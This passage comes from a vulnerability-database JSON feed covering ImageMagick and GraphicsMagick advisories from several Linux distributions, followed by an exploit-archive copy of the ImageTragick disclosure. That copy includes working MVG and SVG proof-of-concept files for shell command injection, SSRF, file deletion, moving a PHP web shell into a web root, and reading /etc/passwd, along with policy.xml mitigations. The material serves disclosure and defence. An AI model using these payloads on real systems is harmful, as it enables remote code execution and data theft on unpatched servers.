"CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-11T11:00:00", "id": "ALAS-2016-699", "href": "https://alas.aws.amazon.com/ALAS-2016-699.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2022-01-04T11:30:49", "description": "It was discovered that GraphicsMagick incorrectly handled certain image files. \nAn attacker could possibly use this issue to cause a denial of service or other \nunspecified impact.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-01-22T00:00:00", "type": "ubuntu", "title": "GraphicsMagick vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17500", "CVE-2017-17501", "CVE-2017-16547", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17498", "CVE-2017-17783", "CVE-2017-17782", "CVE-2017-16669", "CVE-2017-16545"], "modified": "2020-01-22T00:00:00", "id": "USN-4248-1", "href": "https://ubuntu.com/security/notices/USN-4248-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-04T11:31:58", "description": "It was discovered that GraphicsMagick incorrectly handled certain image files. \nAn attacker could possibly use this issue to cause a denial of service or other \nunspecified impact.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-16T00:00:00", "type": "ubuntu", "title": "GraphicsMagick vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11638", "CVE-2017-12936", "CVE-2017-13737", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-12937", "CVE-2017-13776", "CVE-2017-13777", "CVE-2017-13065", "CVE-2017-11642", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-12935", "CVE-2017-13775", "CVE-2017-13134"], "modified": "2019-12-16T00:00:00", "id": "USN-4222-1", "href": "https://ubuntu.com/security/notices/USN-4222-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-04T12:26:55", "description": "Nikolay Ermishkin and Stewie discovered that ImageMagick incorrectly \nsanitized untrusted input. A remote attacker could use these issues to \nexecute arbitrary code. These issues are known as \"ImageTragick\". This \nupdate disables problematic coders via the /etc/ImageMagick-6/policy.xml \nconfiguration file. In certain environments the coders may need to be \nmanually re-enabled after making sure that ImageMagick does not process \nuntrusted input. (CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, \nCVE-2016-3717, CVE-2016-3718)\n\nBob Friesenhahn discovered that ImageMagick allowed injecting commands via \nan image file or filename. A remote attacker could use this issue to \nexecute arbitrary code. (CVE-2016-5118)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-02T00:00:00", "type": "ubuntu", "title": "ImageMagick vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3716", "CVE-2016-5118", "CVE-2016-3714", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-3715"], "modified": "2016-06-02T00:00:00", "id": "USN-2990-1", "href": "https://ubuntu.com/security/notices/USN-2990-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "A possible heap overflow of the EscapeParenthesis() function (CVE-2016-7447). The Utah RLE reader did not validate that header information was reasonable given the file size and so it could cause huge memory allocations and/or consume huge amounts of CPU (CVE-2016-7448). The TIFF reader had a bug pertaining to use of TIFFGetField() when a 'count' value is returned. The bug caused a heap read overflow (due to using strlcpy() to copy a possibly unterminated string) which could allow an untrusted file to crash the software (CVE-2016-7449). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-09-28T05:59:24", "type": "mageia", "title": "Updated graphicsmagick packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449"], "modified": "2016-09-28T05:59:24", "id": "MGASA-2016-0325", "href": "https://advisories.mageia.org/MGASA-2016-0325.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application (CVE-2016-3714). It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717). A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images (CVE-2016-3718). The imagemagick package has been updated to version 6.9.4-2 to fix these issues and several other bugs. \n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-20T11:38:30", "type": "mageia", "title": "Updated imagemagick/ruby-rmagic packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-20T11:38:30", "id": "MGASA-2016-0188", "href": "https://advisories.mageia.org/MGASA-2016-0188.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2021-06-08T18:38:50", "description": "GraphicsMagick is a comprehensive image processing package which is initial ly based on ImageMagick 5.5.2, but which has undergone significant re-work by the GraphicsMagick Group to significantly improve the quality and performan ce of the software. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-31T18:06:21", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: GraphicsMagick-1.3.28-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915"], "modified": "2018-01-31T18:06:21", "id": "FEDORA:DFB316077DF1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ISKX4WLRTYSRACWKG6AHO35A6HAVWHBB/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-08T18:38:50", "description": "GraphicsMagick is a comprehensive image processing package which is initial ly based on ImageMagick 5.5.2, but which has undergone significant re-work by the GraphicsMagick Group to significantly improve the quality and performan ce of the software. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-31T21:59:04", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: GraphicsMagick-1.3.28-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915"], "modified": "2018-01-31T21:59:04", "id": "FEDORA:C16F56079703", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/M7ZZRPUL2DNIAIFTNGOFAV2VTBMMSRXA/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:38", "description": "GraphicsMagick is a comprehensive image processing package which is initial ly based on ImageMagick 5.5.2, but which has undergone significant re-work by the GraphicsMagick Group to significantly improve the quality and performan ce of the software. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-30T00:57:16", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: GraphicsMagick-1.3.32-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11638", "CVE-2017-11642", "CVE-2017-11722", "CVE-2017-12805", "CVE-2017-12806", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13648", "CVE-2017-13736", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-14504", "CVE-2017-14649", "CVE-2017-14733", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-16545", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-18219", "CVE-2017-18220", "CVE-2018-6799", "CVE-2019-11470", "CVE-2019-11472", "CVE-2019-11473", "CVE-2019-11474"], "modified": "2019-06-30T00:57:16", "id": "FEDORA:C7F6A6178920", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PF62B5PJA2JDUOCKJGUQO3SPL74BEYSV/", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-28T18:41:38", "description": "GraphicsMagick is a comprehensive image processing package which is initial ly based on ImageMagick 5.5.2, but which has undergone significant re-work by the GraphicsMagick Group to significantly improve the quality and performan ce of the software. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-30T02:27:02", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: GraphicsMagick-1.3.32-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11638", "CVE-2017-11642", "CVE-2017-11722", "CVE-2017-12805", "CVE-2017-12806", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13648", "CVE-2017-13736", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-14504", "CVE-2017-14649", "CVE-2017-14733", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-16545", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-18219", "CVE-2017-18220", "CVE-2018-6799", "CVE-2019-11470", "CVE-2019-11472", "CVE-2019-11473", "CVE-2019-11474"], "modified": "2019-06-30T02:27:02", "id": "FEDORA:408C160062DD", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WHIKB4TP6KBJWT2UIPWL5MWMG5QXKGEJ/", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "altlinux": [{"lastseen": "2022-06-10T03:07:14", "description": "6.8.4.10-alt3.M70P.1 built May 20, 2016 Andrey Cherepanov in task [#164801](<https://git.altlinux.org/tasks/164801/>) \n--- \nMay 18, 2016 Andrey Cherepanov \n \n \n - Apply security patches from Debian:\n ImageTragick: The coders EPHEMERAL, URL, HTTPS, MVG, MSL, TEXT,\n SHOW, WIN, and PLT are disabled via policy.xml file, since they are\n vulnerable to code injection. This mitigates CVE-2016-3714,\n CVE-2016-3715, CVE-2016-3716, CVE-2016-3717, and CVE-2016-3718.\n Since ImageMagick reverts to its internal SVG renderer (which uses\n MVG coder) if Inkscape or RSVG is not used, the option --with-rsvg\n is included. Closes: 823542. In addition, some other actions were\n taken with respect to these vulnerabilities:\n - Drop the PLT/Gnuplot decoder, which was vulnerable to command\n injection.\n - Some sanitization for input filenames in http/https delegates is\n added.\n - Indirect filename are now authorized by policy.\n - Indirect reads with label:@ are prevented.\n - Less secure coders (such as MVG, TEXT, and MSL) require explicit\n reference in the filename (e.g. mvg:my-graph.mvg).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-20T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package ImageMagick version 6.8.4.10-alt3.M70P.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-20T00:00:00", "id": "682061AC284886CF3E2D521ABCE02271", "href": "https://packages.altlinux.org/en/p7/srpms/ImageMagick/1991632811917746209", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:20", "description": "\nImageMagick 7.0.1-0 6.9.3-9 - ImageTragick Multiple Vulnerabilities", "edition": 2, "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-04T00:00:00", "title": "ImageMagick 7.0.1-0 6.9.3-9 - ImageTragick Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-04T00:00:00", "id": "EXPLOITPACK:E547A33BCC88CE840B8FDF179CDA0103", "href": "", "sourceData": "Nikolay Ermishkin from the Mail.Ru Security Team discovered several\nvulnerabilities in ImageMagick.\nWe've reported these issues to developers of ImageMagick and they made a\nfix for RCE in sources and released new version (6.9.3-9 released\n2016-04-30 http://legacy.imagemagick.org/script/changelog.php), but this\nfix seems to be incomplete. We are still working with developers.\n\nImageMagick: Multiple vulnerabilities in image decoder\n\n1. CVE-2016-3714 - Insufficient shell characters filtering leads to\n(potentially remote) code execution\n\nInsufficient filtering for filename passed to delegate's command allows\nremote code execution during conversion of several file formats.\n\nImageMagick allows to process files with external libraries. This\nfeature is called 'delegate'. It is implemented as a system() with\ncommand string ('command') from the config file delegates.xml with\nactual value for different params (input/output filenames etc). Due to\ninsufficient %M param filtering it is possible to conduct shell command\ninjection. One of the default delegate's command is used to handle https\nrequests:\n\"wget\" -q -O \"%o\" \"https:%M\"\nwhere %M is the actual link from the input. It is possible to pass the\nvalue like `https://example.com\"|ls \"-la` and execute unexpected 'ls\n-la'. (wget or curl should be installed)\n\n$ convert 'https://example.com\"|ls \"-la' out.png\ntotal 32\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\n...\n\n\nThe most dangerous part is ImageMagick supports several formats like\nsvg, mvg (thanks to https://hackerone.com/stewie for his research of\nthis file format and idea of the local file read vulnerability in\nImageMagick, see below), maybe some others - which allow to include\nexternal files from any supported protocol including delegates. As a\nresult, any service, which uses ImageMagick to process user supplied\nimages and uses default delegates.xml / policy.xml, may be vulnerable to\nthis issue.\n\nexploit.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nfill 'url(https://example.com/image.jpg\"|ls \"-la)'\npop graphic-context\n\nexploit.svg\n-=-=-=-=-=-=-=-=-\n<?xml version=\"1.0\" standalone=\"no\"?>\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\"\n\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n<svg width=\"640px\" height=\"480px\" version=\"1.1\"\nxmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\n\"http://www.w3.org/1999/xlink\">\n<image xlink:href=\"https://example.com/image.jpg\"|ls \"-la\"\nx=\"0\" y=\"0\" height=\"640px\" width=\"480px\"/>\n</svg>\n\n$ convert exploit.mvg out.png\ntotal 32\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\n...\n\nImageMagick tries to guess the type of the file by it's content, so\nexploitation doesn't depend on the file extension. You can rename\nexploit.mvg to exploit.jpg or exploit.png to bypass file type checks. In\naddition, ImageMagick's tool 'identify' is also vulnerable, so it can't\nbe used as a protection to filter file by it's content and creates\nadditional attack vectors (e.g. via 'less exploit.jpg', because\n'identify' is invoked via lesspipe.sh).\nUbuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16\nx86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest\nsources from 6 and 7 branches all are vulnerable. Ghostscript and wget\n(or curl) should be installed on the system for successful PoC\nexecution. For svg PoC ImageMagick's svg parser should be used, not rsvg.\n\nAll other issues also rely on dangerous ImageMagick feature of external\nfiles inclusion from any supported protocol in formats like svg and mvg.\n\n2. CVE-2016-3718 - SSRF\nIt is possible to make HTTP GET or FTP request:\n\nssrf.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nfill 'url(http://example.com/)'\npop graphic-context\n\n$ convert ssrf.mvg out.png # makes http request to example.com\n\n3. CVE-2016-3715 - File deletion\nIt is possible to delete files by using ImageMagick's 'ephemeral' pseudo\nprotocol which deletes files after reading:\n\ndelete_file.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\npopgraphic-context\n\n$ touch /tmp/delete.txt\n$ convert delete_file.mvg out.png # deletes /tmp/delete.txt\n\n4. CVE-2016-3716 - File moving\nIt is possible to move image files to file with any extension in any\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\nimage.gif should exist in known location - /tmp/ for PoC (in real life\nit may be web service written in PHP, which allows to upload raw txt\nfiles and process images with ImageMagick):\n\nfile_move.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\npopgraphic-context\n\n/tmp/msl.txt\n-=-=-=-=-=-=-=-=-\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<image>\n<read filename=\"/tmp/image.gif\" />\n<write filename=\"/var/www/shell.php\" />\n</image>\n\n/tmp/image.gif - image with php shell inside\n(https://www.secgeek.net/POC/POC.gif for example)\n\n$ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php\n\n5. CVE-2016-3717 - Local file read (independently reported by original\nresearch author - https://hackerone.com/stewie)\nIt is possible to get content of the files from the server by using\nImageMagick's 'label' pseudo protocol:\n\nfile_read.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'label:@...c/passwd'\npop graphic-context\n\n$ convert file_read.mvg out.png # produces file with text rendered from\n/etc/passwd\n\n\nHow to mitigate the vulnerability.\n\nAvailable patches appear to be incomplete.\nIf you use ImageMagick or an affected library, we recommend you mitigate\nthe known vulnerabilities by doing at least one these two things (but\npreferably both!):\n1. Verify that all image files begin with the expected \ufffdmagic bytes\ufffd\ncorresponding to the image file types you support before sending them to\nImageMagick for processing. (see FAQ for more info)\n2. Use a policy file to disable the vulnerable ImageMagick coders. The\nglobal policy for ImageMagick is usually found in \ufffd/etc/ImageMagick\ufffd.\nThis policy.xml example will disable the coders EPHEMERAL, URL, MVG, and\nMSL:\n\n<policymap>\n <policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"URL\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\n</policymap>\n\n\nVulnerability Disclosure Timeline:\nApril, 21 2016 - file read vulnerability report for one of My.Com\nservices from https://hackerone.com/stewie received by Mail.Ru Security\nTeam. Issue is reportedly known to ImageMagic team.\nApril, 21 2016 - file read vulnerability patched by My.Com development 